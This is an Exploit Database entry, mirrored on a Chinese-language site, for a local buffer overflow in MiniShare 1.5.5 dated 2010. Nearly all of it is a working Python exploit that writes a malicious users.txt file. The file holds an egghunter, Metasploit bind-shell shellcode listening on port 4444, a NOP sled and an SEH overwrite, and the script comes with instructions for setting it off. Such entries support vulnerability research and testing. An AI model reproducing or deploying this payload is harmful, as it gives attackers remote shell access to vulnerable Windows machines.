MiniShare 1.5.5 – ‘users.txt’ Local Buffer Overflow (Egghunter)

• Exploit Database
• 8 阅读

• 作者： 0v3r
  日期： 2010-11-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15575/

• # Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
  # Date: 11/19/2010
  # Author: 0v3r
  # Bug Found By: Chris Gabriel
  # Software Link: http://sourceforge.net/projects/minishare
  # Version: 1.5.5
  # Tested on: Windows XP SP3 EN
  # CVE: N/A
  
  #!/usr/bin/python
  
  # Just rewrote the exploit using egghunter to inject a bind shell payload 
  # Bug found by Chris Gabriel credit goes to him
  #
  # To exploit just place the users.txt file in the Minishare root directory and run minishare.exe
  
  egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
  "\x77\x30\x30\x74" # EGG w00t
  "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
  
  # win32_bind -EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com 
  shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  "\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43"
  "\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41"
  "\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50"
  "\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53"
  "\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c"
  "\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64"
  "\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70"
  "\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c"
  "\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58"
  "\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38"
  "\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76"
  "\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46"
  "\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45"
  "\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64"
  "\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73"
  "\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48"
  "\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70"
  "\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58"
  "\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e"
  "\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50"
  "\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c"
  "\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53"
  "\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63"
  "\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61"
  "\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72"
  "\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e"
  "\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79"
  "\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59"
  "\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f"
  "\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48"
  "\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50"
  "\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54"
  "\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36"
  "\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63"
  "\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e"
  "\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47"
  "\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72"
  "\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e"
  "\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a"
  "\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42"
  "\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b"
  "\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b"
  "\x4f\x4e\x36\x4b\x4f\x7a\x70\x43")
  
  nops = "\x90" * (386 - len(egghunter))
  morenops = "\x90" * 32 # need enough NOPs to overwrite the first instance of the egg
  seh= "\xE7\x13\x40\x00"# POP POP RET
  nseh = "\xeb\xc0\x90\x90"# short jump 64 bytes
  egg= "w00tw00t"# the key the egghunter looks for
  
  buff = nops+ egghunter+nseh + seh+ morenops + egg + shellcode
  
  #[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]
  
  try:
   	f = open("users.txt",'w')
  	f.write(buff)
  	f.close()
  
  	print "\n"	
  	print "\t---------------------------------------------------------------------------------"
  	print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
  	print "\t---------------------------------------------------------------------------------"
  	print "\n"
   
  	print "\t- File 'users.txt' created..."
  	print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n" 
  except:
  	print "\t-Oooops! Can't write file 'users.txt'...\n"